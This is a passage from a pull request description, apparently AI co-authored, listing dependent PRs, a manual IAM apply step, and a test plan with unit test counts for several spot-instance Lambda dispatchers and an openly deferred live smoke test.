## Dependencies (this PR's code is inert until all land — merging has ZERO live effect until deployed + wired)
- nousergon-lib-PR178 (`nousergon_lib.spot_dispatch`) — merge + PyPI/git-tag publish (`v0.100.0`).
- alpha-engine-config-PR2128 (`sf_watch_spot_bootstrap.sh`/`sf_watch_run.sh` + IAM + `sf-watch.yml` wiring).
- Operator-manual IAM apply (`alpha-engine-sf-watch-executor-role`/`-profile`, per PR2128's IAM README section) + this Lambda's own `deploy.sh --bootstrap` — no GHA auto-apply for IAM per the fleet's 4-incident policy.

## Test plan
- [x] `scheduled-groom-dispatcher/test_handler.py`: 44/44 passed (against `nousergon-lib` installed from the nousergon-lib-PR178 branch, since `v0.100.0` doesn't exist as a tag until that PR merges).
- [x] `ci-watch-dispatcher/test_handler.py`: 13/13 passed.
- [x] `sf-watch-spot-dispatcher/test_handler.py` (new): 15/15 passed.
- [x] `spot-orphan-reaper/test_handler.py`: 18/18 passed.
- [x] `index.py` syntax + `deploy.sh` syntax + `iam-policy.json`/workflow YAML validated.
- [ ] Live smoke test (`deploy.sh --smoke`, fires a real spot box) — deliberately deferred to Phase D, after live IAM/Lambda provisioning, same as the checklist ci-watch-dispatcher's own PR left open.

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

https://claude.ai/code/session_01Tesa7b5dy9kudZgqPCtCac